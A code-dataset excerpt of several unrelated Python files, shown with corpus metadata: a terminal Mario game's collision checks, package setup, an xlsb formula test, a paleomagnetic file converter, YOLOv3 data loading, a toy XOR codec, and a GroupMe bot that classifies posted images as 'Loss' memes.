if mario.x + 2 >= tortise.x and mario.x <= tortise.x + 2 and \
mario.y == 27:
mario.health -= 1
tortise.remove_person(win)
tortise.create_person(win)
def goblin(self, mario, Goblin, win):
if mario.x + 2 >= Goblin.x and mario.x <= Goblin.x + 2 and \
(mario.y == 27 or mario.y == 26):
mario.health -= 1
Goblin.remove_person(win)
Goblin.create_person(win)
def coin(self, mario, coins, win):
for coin in coins:
if mario.x + 2 >= coin.x and mario.x <= coin.x and \
(mario.y == coin.y or mario.y - 1 == coin.y):
mario.score += 50
os.system("aplay -q ../assets/smb_coin.wav &")
coins.pop(coins.index(coin))
coin.remove_coin(win)
del coin
| <filename>src/collision_x.py
import os
class Collision_horizontal(object):
"""Class to check x-axis collisions."""
def __init__(self):
pass
def check(self, dir, mario, pipes, boxes):
return (self.pipes(dir, mario, pipes) or self.boxes(dir, mario, boxes))
def pipes(self, dir, mario, pipes):
ans = False
for single_pipe in pipes:
ans = (ans or self.pipe(dir, mario, single_pipe))
return ans
def pipe(self, dir, mario, single_pipe):
if dir == 1 and mario.x + 2 < single_pipe.x and \
mario.x + 2 + mario.vel >= single_pipe.x and \
mario.y > single_pipe.h:
return True
elif dir == -1 and mario.x > single_pipe.x + 5 and \
mario.x - mario.vel <= single_pipe.x + 5 and \
mario.y > single_pipe.h:
return True
else:
return False
def boxes(self, dir, mario, boxes):
ans = False
for brick in boxes:
ans = (ans or self.brick(dir, mario, brick[0]))
return ans
def brick(self, dir, mario, brick):
if dir == 1 and mario.x + 2 < brick.x and \
mario.x + 2 + mario.vel >= brick.x and mario.y > brick.y and \
mario.y < brick.y + 2:
return True
elif dir == -1 and mario.x > brick.x + 9 and \
mario.x - mario.vel <= brick.x + 9 and mario.y > brick.y and \
mario.y < brick.y + 2:
return True
else:
return False
def tort(self, mario, set_tort, win):
for tortise in set_tort:
if mario.x + 2 >= tortise.x and mario.x <= tortise.x + 2 and \
mario.y == 27:
mario.health -= 1
tortise.remove_person(win)
tortise.create_person(win)
def goblin(self, mario, Goblin, win):
if mario.x + 2 >= Goblin.x and mario.x <= Goblin.x + 2 and \
(mario.y == 27 or mario.y == 26):
mario.health -= 1
Goblin.remove_person(win)
Goblin.create_person(win)
def coin(self, mario, coins, win):
for coin in coins:
if mario.x + 2 >= coin.x and mario.x <= coin.x and \
(mario.y == coin.y or mario.y - 1 == coin.y):
mario.score += 50
os.system("aplay -q ../assets/smb_coin.wav &")
coins.pop(coins.index(coin))
coin.remove_coin(win)
del coin
| en | 0.878218 | Class to check x-axis collisions. | 3.609497 | 4 |
setup.py | guy4261/fight-churn | 151 | 6613971 | <filename>setup.py
import setuptools
import pkg_resources
import pathlib
# https://stackoverflow.com/questions/49689880/proper-way-to-parse-requirements-file-after-pip-upgrade-to-pip-10-x-x
with pathlib.Path('requirements.txt').open() as requirements_txt:
install_requires = [
str(requirement)
for requirement
in pkg_resources.parse_requirements(requirements_txt)
]
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="fightchurn",
version="1.0.0",
author="<NAME>",
author_email="<EMAIL>",
description="Code from the book Fighting Churn With Data",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/carl24k/fight-churn",
project_urls={
"Bug Tracker": "https://github.com/carl24k/fight-churn/issues",
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_data={'fightchurn' : ['fightchurn/listings/conf/*.json',
'fightchurn/listings/*/*.sql',
'fightchurn/datagen/*/*.csv',
'fightchurn/datagen/*/*.sql']},
include_package_data=True,
packages=['fightchurn',
'fightchurn.listings',
'fightchurn.listings.conf',
'fightchurn.listings.chap3',
'fightchurn.listings.chap5',
'fightchurn.listings.chap6',
'fightchurn.listings.chap7',
'fightchurn.listings.chap8',
'fightchurn.listings.chap9',
'fightchurn.listings.chap10',
'fightchurn.datagen',
'fightchurn.datagen.conf',
'fightchurn.datagen.schema'],
scripts=['fightchurn/run_churn_listing.py',
'fightchurn/datagen/churndb.py',
'fightchurn/datagen/churnsim.py'],
python_requires=">=3.9",
install_requires= install_requires
)
| <filename>setup.py
import setuptools
import pkg_resources
import pathlib
# https://stackoverflow.com/questions/49689880/proper-way-to-parse-requirements-file-after-pip-upgrade-to-pip-10-x-x
with pathlib.Path('requirements.txt').open() as requirements_txt:
install_requires = [
str(requirement)
for requirement
in pkg_resources.parse_requirements(requirements_txt)
]
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="fightchurn",
version="1.0.0",
author="<NAME>",
author_email="<EMAIL>",
description="Code from the book Fighting Churn With Data",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/carl24k/fight-churn",
project_urls={
"Bug Tracker": "https://github.com/carl24k/fight-churn/issues",
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_data={'fightchurn' : ['fightchurn/listings/conf/*.json',
'fightchurn/listings/*/*.sql',
'fightchurn/datagen/*/*.csv',
'fightchurn/datagen/*/*.sql']},
include_package_data=True,
packages=['fightchurn',
'fightchurn.listings',
'fightchurn.listings.conf',
'fightchurn.listings.chap3',
'fightchurn.listings.chap5',
'fightchurn.listings.chap6',
'fightchurn.listings.chap7',
'fightchurn.listings.chap8',
'fightchurn.listings.chap9',
'fightchurn.listings.chap10',
'fightchurn.datagen',
'fightchurn.datagen.conf',
'fightchurn.datagen.schema'],
scripts=['fightchurn/run_churn_listing.py',
'fightchurn/datagen/churndb.py',
'fightchurn/datagen/churnsim.py'],
python_requires=">=3.9",
install_requires= install_requires
)
| en | 0.534518 | # https://stackoverflow.com/questions/49689880/proper-way-to-parse-requirements-file-after-pip-upgrade-to-pip-10-x-x | 2.111011 | 2 |
test.py | cccs-jh/pyxlsb2 | 16 | 6613972 | import sys
import time
from pyxlsb2 import open_workbook
from pyxlsb2.formula import Formula
a = time.time()
print('Opening workbook... ', end='', flush=True)
with open_workbook(sys.argv[1]) as wb:
d = time.time() - a
print('Done! ({} seconds)'.format(d))
for s in wb.sheets:
print('Reading sheet {}...\n'.format(s), end='', flush=True)
a = time.time()
with wb.get_sheet_by_name(s.name) as sheet:
for row in sheet:
for cell in row:
formula_str = Formula.parse(cell.formula)
if formula_str._tokens:
try:
print(formula_str.stringify(wb))
except NotImplementedError as exp:
print('ERROR({}) {}'.format(exp, str(cell)))
except Exception:
print('ERROR ' + str(cell))
d = time.time() - a
print('Done! ({} seconds)'.format(d))
| import sys
import time
from pyxlsb2 import open_workbook
from pyxlsb2.formula import Formula
a = time.time()
print('Opening workbook... ', end='', flush=True)
with open_workbook(sys.argv[1]) as wb:
d = time.time() - a
print('Done! ({} seconds)'.format(d))
for s in wb.sheets:
print('Reading sheet {}...\n'.format(s), end='', flush=True)
a = time.time()
with wb.get_sheet_by_name(s.name) as sheet:
for row in sheet:
for cell in row:
formula_str = Formula.parse(cell.formula)
if formula_str._tokens:
try:
print(formula_str.stringify(wb))
except NotImplementedError as exp:
print('ERROR({}) {}'.format(exp, str(cell)))
except Exception:
print('ERROR ' + str(cell))
d = time.time() - a
print('Done! ({} seconds)'.format(d))
| none | 1 | 2.661118 | 3 | |
common.py | sile16/swarm | 0 | 6613973 | import socket
import dnsjob
server_port = 22300
server_pub_port = 22301
worker_port = 22400
logging_port = 22500
job_servers = {'dns':dnsjob.DNSJobServer()}
job_workers = {'dns':dnsjob.DNSJobWorker()}
job_loggers = {'dns':dnsjob.DNSJobLogger()}
def get_client_ip(server):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((server,server_pub_port))
worker_ip = s.getsockname()[0]
s.close()
return worker_ip
| import socket
import dnsjob
server_port = 22300
server_pub_port = 22301
worker_port = 22400
logging_port = 22500
job_servers = {'dns':dnsjob.DNSJobServer()}
job_workers = {'dns':dnsjob.DNSJobWorker()}
job_loggers = {'dns':dnsjob.DNSJobLogger()}
def get_client_ip(server):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((server,server_pub_port))
worker_ip = s.getsockname()[0]
s.close()
return worker_ip
| none | 1 | 2.572196 | 3 | |
programs/conversion_scripts/bgc_magic.py | yamamon75/PmagPy | 2 | 6613974 | #!/usr/bin/env python
"""
NAME
bgc_magic.py
DESCRIPTION
converts Berkeley Geochronology Center (BGC) format files to measurements format files
SYNTAX
bgc_magic.py [command line options]
OPTIONS
-h: prints the help message and quits.
-usr USER: Colon delimited list of analysts, default is ""
-ID: directory for input file if not included in -f flag
-f FILE: specify AUTOCORE format input file, required
-WD: directory to output files to (default : current directory)
-F FILE: specify output measurements file, default is measurements.txt
-Fsp FILE: specify output specimens.txt file, default is specimens.txt
-Fsa FILE: specify output samples.txt file, default is samples.txt
-Fsi FILE: specify output sites.txt file, default is sites.txt
-Flo FILE: specify output locations.txt file, default is locations.txt
-spc NUM : specify number of characters to designate a specimen, default = 0
-loc LOCNAME : specify location/study name
-site SITENAME : specify site name (if site name can be generated from sample name, see conventions list under the -ncn flag)
-ncn NCON: specify naming convention: default is #1 below
Sample naming convention:
[1] XXXXY: where XXXX is an arbitrary length site designation and Y
is the single character sample designation. e.g., TG001a is the
first sample from site TG001. [default]
[2] XXXX-YY: YY sample from site XXXX (XXX, YY of arbitary length)
[3] XXXX.YY: YY sample from site XXXX (XXX, YY of arbitary length)
[4-Z] XXXX[YYY]: YYY is sample designation with Z characters from site XXX
[5] site name same as sample
[6] site is entered under a separate column -- NOT CURRENTLY SUPPORTED
[7-Z] [XXXX]YYY: XXXX is site designation with Z characters with sample name XXXXYYYY
NB: all others you will have to customize your self
or e-mail <EMAIL>sd.edu for help.
-A: don't average replicate measurements
-mcd [SO-MAG,SO-SUN,SO-SIGHT...] supply how these samples were oriented
-v NUM : specify the volume in cc of the sample, default 12cc. Will use vol in data file if volume!=0 in file.
-tz: timezone in pytz library format. list of timzones can be found at http://pytz.sourceforge.net/. (default: US/Pacific)
-append: append output files to existing files, don't overwrite.
INPUT
BGC paleomag format file
"""
import sys
from pmagpy import convert_2_magic as convert
def do_help():
return __doc__
def main():
kwargs={}
if "-h" in sys.argv:
help(__name__)
sys.exit()
if "-usr" in sys.argv:
ind=sys.argv.index("-usr")
kwargs['user']=sys.argv[ind+1]
if '-WD' in sys.argv:
ind = sys.argv.index('-WD')
kwargs['dir_path'] = sys.argv[ind+1]
if '-ID' in sys.argv:
ind = sys.argv.index('-ID')
kwargs['input_dir_path'] = sys.argv[ind+1]
if '-F' in sys.argv:
ind = sys.argv.index("-F")
kwargs['meas_file'] = sys.argv[ind+1]
if '-Fsp' in sys.argv:
ind=sys.argv.index("-Fsp")
kwargs['spec_file']=sys.argv[ind+1]
if '-Fsa' in sys.argv:
ind = sys.argv.index("-Fsa")
kwargs['samp_file'] = sys.argv[ind+1]
if '-Fsi' in sys.argv: # LORI addition
ind=sys.argv.index("-Fsi")
kwargs['site_file']=sys.argv[ind+1]
if '-Flo' in sys.argv: # Kevin addition
ind=sys.argv.index("-Flo")
kwargs['loc_file']=sys.argv[ind+1]
if '-f' in sys.argv:
ind = sys.argv.index("-f")
kwargs['mag_file'] = sys.argv[ind+1]
if "-loc" in sys.argv:
ind = sys.argv.index("-loc")
kwargs['location'] = sys.argv[ind+1]
if "-site" in sys.argv:
ind = sys.argv.index("-site")
kwargs['site'] = sys.argv[ind+1]
if "-A" in sys.argv:
kwargs['noave'] = True
if "-mcd" in sys.argv:
ind = sys.argv.index("-mcd")
kwargs['meth_code'] = sys.argv[ind+1]
if "-v" in sys.argv:
ind = sys.argv.index("-v")
kwargs['volume'] = sys.argv[ind+1] # enter volume in cc, convert to m^3
if "-ncn" in sys.argv:
ind=sys.argv.index("-ncn")
kwargs['samp_con']=sys.argv[ind+1]
if "-spc" in sys.argv:
ind=sys.argv.index("-spc")
kwargs['specnum']=int(sys.argv[ind+1])
if '-tz' in sys.argv:
ind=sys.argv.index("-tz")
kwargs['timezone']=sys.argv[ind+1]
if '-append' in sys.argv:
kwargs['append']=True
convert.bgc(**kwargs)
if __name__ == "__main__":
main()
| #!/usr/bin/env python
"""
NAME
bgc_magic.py
DESCRIPTION
converts Berkeley Geochronology Center (BGC) format files to measurements format files
SYNTAX
bgc_magic.py [command line options]
OPTIONS
-h: prints the help message and quits.
-usr USER: Colon delimited list of analysts, default is ""
-ID: directory for input file if not included in -f flag
-f FILE: specify AUTOCORE format input file, required
-WD: directory to output files to (default : current directory)
-F FILE: specify output measurements file, default is measurements.txt
-Fsp FILE: specify output specimens.txt file, default is specimens.txt
-Fsa FILE: specify output samples.txt file, default is samples.txt
-Fsi FILE: specify output sites.txt file, default is sites.txt
-Flo FILE: specify output locations.txt file, default is locations.txt
-spc NUM : specify number of characters to designate a specimen, default = 0
-loc LOCNAME : specify location/study name
-site SITENAME : specify site name (if site name can be generated from sample name, see conventions list under the -ncn flag)
-ncn NCON: specify naming convention: default is #1 below
Sample naming convention:
[1] XXXXY: where XXXX is an arbitrary length site designation and Y
is the single character sample designation. e.g., TG001a is the
first sample from site TG001. [default]
[2] XXXX-YY: YY sample from site XXXX (XXX, YY of arbitary length)
[3] XXXX.YY: YY sample from site XXXX (XXX, YY of arbitary length)
[4-Z] XXXX[YYY]: YYY is sample designation with Z characters from site XXX
[5] site name same as sample
[6] site is entered under a separate column -- NOT CURRENTLY SUPPORTED
[7-Z] [XXXX]YYY: XXXX is site designation with Z characters with sample name XXXXYYYY
NB: all others you will have to customize your self
or e-mail <EMAIL>sd.edu for help.
-A: don't average replicate measurements
-mcd [SO-MAG,SO-SUN,SO-SIGHT...] supply how these samples were oriented
-v NUM : specify the volume in cc of the sample, default 12cc. Will use vol in data file if volume!=0 in file.
-tz: timezone in pytz library format. list of timzones can be found at http://pytz.sourceforge.net/. (default: US/Pacific)
-append: append output files to existing files, don't overwrite.
INPUT
BGC paleomag format file
"""
import sys
from pmagpy import convert_2_magic as convert
def do_help():
return __doc__
def main():
kwargs={}
if "-h" in sys.argv:
help(__name__)
sys.exit()
if "-usr" in sys.argv:
ind=sys.argv.index("-usr")
kwargs['user']=sys.argv[ind+1]
if '-WD' in sys.argv:
ind = sys.argv.index('-WD')
kwargs['dir_path'] = sys.argv[ind+1]
if '-ID' in sys.argv:
ind = sys.argv.index('-ID')
kwargs['input_dir_path'] = sys.argv[ind+1]
if '-F' in sys.argv:
ind = sys.argv.index("-F")
kwargs['meas_file'] = sys.argv[ind+1]
if '-Fsp' in sys.argv:
ind=sys.argv.index("-Fsp")
kwargs['spec_file']=sys.argv[ind+1]
if '-Fsa' in sys.argv:
ind = sys.argv.index("-Fsa")
kwargs['samp_file'] = sys.argv[ind+1]
if '-Fsi' in sys.argv: # LORI addition
ind=sys.argv.index("-Fsi")
kwargs['site_file']=sys.argv[ind+1]
if '-Flo' in sys.argv: # Kevin addition
ind=sys.argv.index("-Flo")
kwargs['loc_file']=sys.argv[ind+1]
if '-f' in sys.argv:
ind = sys.argv.index("-f")
kwargs['mag_file'] = sys.argv[ind+1]
if "-loc" in sys.argv:
ind = sys.argv.index("-loc")
kwargs['location'] = sys.argv[ind+1]
if "-site" in sys.argv:
ind = sys.argv.index("-site")
kwargs['site'] = sys.argv[ind+1]
if "-A" in sys.argv:
kwargs['noave'] = True
if "-mcd" in sys.argv:
ind = sys.argv.index("-mcd")
kwargs['meth_code'] = sys.argv[ind+1]
if "-v" in sys.argv:
ind = sys.argv.index("-v")
kwargs['volume'] = sys.argv[ind+1] # enter volume in cc, convert to m^3
if "-ncn" in sys.argv:
ind=sys.argv.index("-ncn")
kwargs['samp_con']=sys.argv[ind+1]
if "-spc" in sys.argv:
ind=sys.argv.index("-spc")
kwargs['specnum']=int(sys.argv[ind+1])
if '-tz' in sys.argv:
ind=sys.argv.index("-tz")
kwargs['timezone']=sys.argv[ind+1]
if '-append' in sys.argv:
kwargs['append']=True
convert.bgc(**kwargs)
if __name__ == "__main__":
main()
| en | 0.593717 | #!/usr/bin/env python NAME bgc_magic.py DESCRIPTION converts Berkeley Geochronology Center (BGC) format files to measurements format files SYNTAX bgc_magic.py [command line options] OPTIONS -h: prints the help message and quits. -usr USER: Colon delimited list of analysts, default is "" -ID: directory for input file if not included in -f flag -f FILE: specify AUTOCORE format input file, required -WD: directory to output files to (default : current directory) -F FILE: specify output measurements file, default is measurements.txt -Fsp FILE: specify output specimens.txt file, default is specimens.txt -Fsa FILE: specify output samples.txt file, default is samples.txt -Fsi FILE: specify output sites.txt file, default is sites.txt -Flo FILE: specify output locations.txt file, default is locations.txt -spc NUM : specify number of characters to designate a specimen, default = 0 -loc LOCNAME : specify location/study name -site SITENAME : specify site name (if site name can be generated from sample name, see conventions list under the -ncn flag) -ncn NCON: specify naming convention: default is #1 below Sample naming convention: [1] XXXXY: where XXXX is an arbitrary length site designation and Y is the single character sample designation. e.g., TG001a is the first sample from site TG001. [default] [2] XXXX-YY: YY sample from site XXXX (XXX, YY of arbitary length) [3] XXXX.YY: YY sample from site XXXX (XXX, YY of arbitary length) [4-Z] XXXX[YYY]: YYY is sample designation with Z characters from site XXX [5] site name same as sample [6] site is entered under a separate column -- NOT CURRENTLY SUPPORTED [7-Z] [XXXX]YYY: XXXX is site designation with Z characters with sample name XXXXYYYY NB: all others you will have to customize your self or e-mail <EMAIL>sd.edu for help. -A: don't average replicate measurements -mcd [SO-MAG,SO-SUN,SO-SIGHT...] supply how these samples were oriented -v NUM : specify the volume in cc of the sample, default 12cc. Will use vol in data file if volume!=0 in file. -tz: timezone in pytz library format. list of timzones can be found at http://pytz.sourceforge.net/. (default: US/Pacific) -append: append output files to existing files, don't overwrite. INPUT BGC paleomag format file # LORI addition # Kevin addition # enter volume in cc, convert to m^3 | 2.452102 | 2 |
models/yolov3/yolov3/dataset.py | yichenj/facegate | 0 | 6613975 | import tensorflow as tf
from absl.flags import FLAGS
@tf.function
def transform_targets_for_output(y_true, grid_size, anchor_idxs):
# y_true: (N, boxes, (x1, y1, x2, y2, class, best_anchor))
N = tf.shape(y_true)[0]
# y_true_out: (N, grid, grid, anchors, [x, y, w, h, obj, class])
y_true_out = tf.zeros(
(N, grid_size, grid_size, tf.shape(anchor_idxs)[0], 6))
anchor_idxs = tf.cast(anchor_idxs, tf.int32)
indexes = tf.TensorArray(tf.int32, 1, dynamic_size=True)
updates = tf.TensorArray(tf.float32, 1, dynamic_size=True)
idx = 0
for i in tf.range(N):
for j in tf.range(tf.shape(y_true)[1]):
if tf.equal(y_true[i][j][2], 0):
continue
anchor_eq = tf.equal(
anchor_idxs, tf.cast(y_true[i][j][5], tf.int32))
if tf.reduce_any(anchor_eq):
box = y_true[i][j][0:4]
box_xy = (y_true[i][j][0:2] + y_true[i][j][2:4]) / 2
anchor_idx = tf.cast(tf.where(anchor_eq), tf.int32)
grid_xy = tf.cast(box_xy // (1/grid_size), tf.int32)
# grid[y][x][anchor] = (tx, ty, bw, bh, obj, class)
indexes = indexes.write(
idx, [i, grid_xy[1], grid_xy[0], anchor_idx[0][0]])
updates = updates.write(
idx, [box[0], box[1], box[2], box[3], 1, y_true[i][j][4]])
idx += 1
# tf.print(indexes.stack())
# tf.print(updates.stack())
return tf.tensor_scatter_nd_update(
y_true_out, indexes.stack(), updates.stack())
def transform_targets(y_train, anchors, anchor_masks, size):
y_outs = []
grid_size = size // 32
# calculate anchor index for true boxes
anchors = tf.cast(anchors, tf.float32)
anchor_area = anchors[..., 0] * anchors[..., 1]
box_wh = y_train[..., 2:4] - y_train[..., 0:2]
box_wh = tf.tile(tf.expand_dims(box_wh, -2),
(1, 1, tf.shape(anchors)[0], 1))
box_area = box_wh[..., 0] * box_wh[..., 1]
intersection = tf.minimum(box_wh[..., 0], anchors[..., 0]) * \
tf.minimum(box_wh[..., 1], anchors[..., 1])
iou = intersection / (box_area + anchor_area - intersection)
anchor_idx = tf.cast(tf.argmax(iou, axis=-1), tf.float32)
anchor_idx = tf.expand_dims(anchor_idx, axis=-1)
y_train = tf.concat([y_train, anchor_idx], axis=-1)
for anchor_idxs in anchor_masks:
y_outs.append(transform_targets_for_output(
y_train, grid_size, anchor_idxs))
grid_size *= 2
return tuple(y_outs)
def transform_images(x_train, size):
x_train = tf.image.resize(x_train, (size, size))
x_train = x_train / 255
return x_train
def parse_yolo_dataset(line, image_path):
line = tf.strings.split(line, ',')
image_file = tf.strings.reduce_join([image_path, line[0]], separator='/')
bbx = tf.strings.to_number(tf.strings.split(line[1:], ' '), out_type=tf.float32)
y = bbx.to_tensor()
paddings = [[0, FLAGS.yolo_max_boxes - tf.shape(y)[0]], [0, 0]]
y = tf.pad(y, paddings)
return image_file, y
def parse_yolo_image(image, label, size):
image = tf.io.read_file(image)
image = tf.io.decode_image(image, channels=3, expand_animations=False)
image = tf.image.resize(image, (size, size))
return image, label
def load_yolo_dataset(image_path, label_file, size=416, shuffle=False, shuffle_buffer_size=512):
dataset = tf.data.TextLineDataset(label_file)
if shuffle:
dataset = dataset.shuffle(buffer_size=shuffle_buffer_size)
dataset = dataset.map(lambda x: parse_yolo_dataset(x, image_path))
dataset = dataset.map(lambda x, y: parse_yolo_image(x, y, size))
return dataset
def get_dataset_size(label_file):
with open(label_file, 'r') as f:
for i, _ in enumerate(f):
pass
return i + 1
| import tensorflow as tf
from absl.flags import FLAGS
@tf.function
def transform_targets_for_output(y_true, grid_size, anchor_idxs):
# y_true: (N, boxes, (x1, y1, x2, y2, class, best_anchor))
N = tf.shape(y_true)[0]
# y_true_out: (N, grid, grid, anchors, [x, y, w, h, obj, class])
y_true_out = tf.zeros(
(N, grid_size, grid_size, tf.shape(anchor_idxs)[0], 6))
anchor_idxs = tf.cast(anchor_idxs, tf.int32)
indexes = tf.TensorArray(tf.int32, 1, dynamic_size=True)
updates = tf.TensorArray(tf.float32, 1, dynamic_size=True)
idx = 0
for i in tf.range(N):
for j in tf.range(tf.shape(y_true)[1]):
if tf.equal(y_true[i][j][2], 0):
continue
anchor_eq = tf.equal(
anchor_idxs, tf.cast(y_true[i][j][5], tf.int32))
if tf.reduce_any(anchor_eq):
box = y_true[i][j][0:4]
box_xy = (y_true[i][j][0:2] + y_true[i][j][2:4]) / 2
anchor_idx = tf.cast(tf.where(anchor_eq), tf.int32)
grid_xy = tf.cast(box_xy // (1/grid_size), tf.int32)
# grid[y][x][anchor] = (tx, ty, bw, bh, obj, class)
indexes = indexes.write(
idx, [i, grid_xy[1], grid_xy[0], anchor_idx[0][0]])
updates = updates.write(
idx, [box[0], box[1], box[2], box[3], 1, y_true[i][j][4]])
idx += 1
# tf.print(indexes.stack())
# tf.print(updates.stack())
return tf.tensor_scatter_nd_update(
y_true_out, indexes.stack(), updates.stack())
def transform_targets(y_train, anchors, anchor_masks, size):
y_outs = []
grid_size = size // 32
# calculate anchor index for true boxes
anchors = tf.cast(anchors, tf.float32)
anchor_area = anchors[..., 0] * anchors[..., 1]
box_wh = y_train[..., 2:4] - y_train[..., 0:2]
box_wh = tf.tile(tf.expand_dims(box_wh, -2),
(1, 1, tf.shape(anchors)[0], 1))
box_area = box_wh[..., 0] * box_wh[..., 1]
intersection = tf.minimum(box_wh[..., 0], anchors[..., 0]) * \
tf.minimum(box_wh[..., 1], anchors[..., 1])
iou = intersection / (box_area + anchor_area - intersection)
anchor_idx = tf.cast(tf.argmax(iou, axis=-1), tf.float32)
anchor_idx = tf.expand_dims(anchor_idx, axis=-1)
y_train = tf.concat([y_train, anchor_idx], axis=-1)
for anchor_idxs in anchor_masks:
y_outs.append(transform_targets_for_output(
y_train, grid_size, anchor_idxs))
grid_size *= 2
return tuple(y_outs)
def transform_images(x_train, size):
x_train = tf.image.resize(x_train, (size, size))
x_train = x_train / 255
return x_train
def parse_yolo_dataset(line, image_path):
line = tf.strings.split(line, ',')
image_file = tf.strings.reduce_join([image_path, line[0]], separator='/')
bbx = tf.strings.to_number(tf.strings.split(line[1:], ' '), out_type=tf.float32)
y = bbx.to_tensor()
paddings = [[0, FLAGS.yolo_max_boxes - tf.shape(y)[0]], [0, 0]]
y = tf.pad(y, paddings)
return image_file, y
def parse_yolo_image(image, label, size):
image = tf.io.read_file(image)
image = tf.io.decode_image(image, channels=3, expand_animations=False)
image = tf.image.resize(image, (size, size))
return image, label
def load_yolo_dataset(image_path, label_file, size=416, shuffle=False, shuffle_buffer_size=512):
dataset = tf.data.TextLineDataset(label_file)
if shuffle:
dataset = dataset.shuffle(buffer_size=shuffle_buffer_size)
dataset = dataset.map(lambda x: parse_yolo_dataset(x, image_path))
dataset = dataset.map(lambda x, y: parse_yolo_image(x, y, size))
return dataset
def get_dataset_size(label_file):
with open(label_file, 'r') as f:
for i, _ in enumerate(f):
pass
return i + 1
| en | 0.393192 | # y_true: (N, boxes, (x1, y1, x2, y2, class, best_anchor)) # y_true_out: (N, grid, grid, anchors, [x, y, w, h, obj, class]) # grid[y][x][anchor] = (tx, ty, bw, bh, obj, class) # tf.print(indexes.stack()) # tf.print(updates.stack()) # calculate anchor index for true boxes | 2.194016 | 2 |
python/code/codec/codec_my.py | knowledgebao/language | 1 | 6613976 | <filename>python/code/codec/codec_my.py
import os
def encrypt(key, s):
'''
1.对字符串s进行编码,返回编码后的数据
2.key必须是数字(0,256)
'''
b = bytearray(str(s).encode("gbk"))
n = len(b) # 求出 b 的字节数
c = bytearray(n*2)
j = 0
for i in range(0, n):
b1 = b[i]
b2 = b1 ^ key # b1 = b2^ key
c1 = b2 % 16
c2 = b2 // 16 # b2 = c2*16 + c1
c1 = c1 + 65
c2 = c2 + 65 # c1,c2都是0~15之间的数,加上65就变成了A-P 的字符的编码
c[j] = c1
c[j+1] = c2
j = j+2
return c.decode("gbk")
def decrypt(key, s):
'''
1.对字符串s进行解密
2.key必须是数字(0,256)
'''
c = bytearray(str(s).encode("gbk"))
n = len(c) # 计算 b 的字节数
if n % 2 != 0:
return ""
n = n // 2
b = bytearray(n)
j = 0
for i in range(0, n):
c1 = c[j]
c2 = c[j+1]
j = j+2
c1 = c1 - 65
c2 = c2 - 65
b2 = c2*16 + c1
b1 = b2 ^ key
b[i] = b1
return b.decode("gbk")
if __name__ == '__main__':
key=123
s=['test1','test2']
for i in s:
e = encrypt(key,i)
d = decrypt(key,e)
print(key,i,e,d)
# 123 test1 PAOBIAPAKE test1
# 123 test2 PAOBIAPAJE test2 | <filename>python/code/codec/codec_my.py
import os
def encrypt(key, s):
'''
1.对字符串s进行编码,返回编码后的数据
2.key必须是数字(0,256)
'''
b = bytearray(str(s).encode("gbk"))
n = len(b) # 求出 b 的字节数
c = bytearray(n*2)
j = 0
for i in range(0, n):
b1 = b[i]
b2 = b1 ^ key # b1 = b2^ key
c1 = b2 % 16
c2 = b2 // 16 # b2 = c2*16 + c1
c1 = c1 + 65
c2 = c2 + 65 # c1,c2都是0~15之间的数,加上65就变成了A-P 的字符的编码
c[j] = c1
c[j+1] = c2
j = j+2
return c.decode("gbk")
def decrypt(key, s):
'''
1.对字符串s进行解密
2.key必须是数字(0,256)
'''
c = bytearray(str(s).encode("gbk"))
n = len(c) # 计算 b 的字节数
if n % 2 != 0:
return ""
n = n // 2
b = bytearray(n)
j = 0
for i in range(0, n):
c1 = c[j]
c2 = c[j+1]
j = j+2
c1 = c1 - 65
c2 = c2 - 65
b2 = c2*16 + c1
b1 = b2 ^ key
b[i] = b1
return b.decode("gbk")
if __name__ == '__main__':
key=123
s=['test1','test2']
for i in s:
e = encrypt(key,i)
d = decrypt(key,e)
print(key,i,e,d)
# 123 test1 PAOBIAPAKE test1
# 123 test2 PAOBIAPAJE test2 | zh | 0.759976 | 1.对字符串s进行编码,返回编码后的数据 2.key必须是数字(0,256) # 求出 b 的字节数 # b1 = b2^ key # b2 = c2*16 + c1 # c1,c2都是0~15之间的数,加上65就变成了A-P 的字符的编码 1.对字符串s进行解密 2.key必须是数字(0,256) # 计算 b 的字节数 # 123 test1 PAOBIAPAKE test1 # 123 test2 PAOBIAPAJE test2 | 3.463815 | 3 |
IsThisLossV1/IsThisLossBot.py | Kyekifino/IsThisLoss | 0 | 6613977 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
import IsThisLossHelper as helper
import IsThisLossBotConfig as conf
import time
import os
import IsThisLossV1 as loss
import tensorflow as tf
import numpy as np
import pandas as pd
from PIL import Image
from io import BytesIO
print("Loading bot...")
classifier, accuracy = loss.getIsThisLossModel()
request_params = conf.request_params()
#Get to the latest message
response = response = requests.get('https://api.groupme.com/v3/groups/' + conf.group_id() + '/messages', params = request_params)
if response.status_code == 200:
response_messages = response.json()['response']['messages']
request_params['after_id'] = response_messages[0]['id']
response = response = requests.get('https://api.groupme.com/v3/groups/' + conf.group_id() + '/messages', params = request_params)
print("Ready to run!")
intro_text = ("Hey there, my name is IsThisLossBotV1!\n"
"I\'ll be sure to butt into the conversation if I see a Loss meme!\n"
"Today I am " + str(100*accuracy) + "% accurate!")
post_params = { 'bot_id' : conf.bot_id(), 'text': intro_text }
requests.post('https://api.groupme.com/v3/bots/post', params = post_params)
while True:
response = requests.get('https://api.groupme.com/v3/groups/' + conf.group_id() + '/messages', params = request_params)
if response.status_code == 200:
response_messages = response.json()['response']['messages']
for message in response_messages:
for attachment in message['attachments']:
if (attachment['type'] == "image"):
print(attachment['url'])
pic_response = requests.get(attachment['url'])
img = Image.open(BytesIO(pic_response.content))
# Resize image to 100x100
final_size = 100
new_image_size = (final_size, final_size)
img = img.resize(new_image_size, Image.ANTIALIAS)
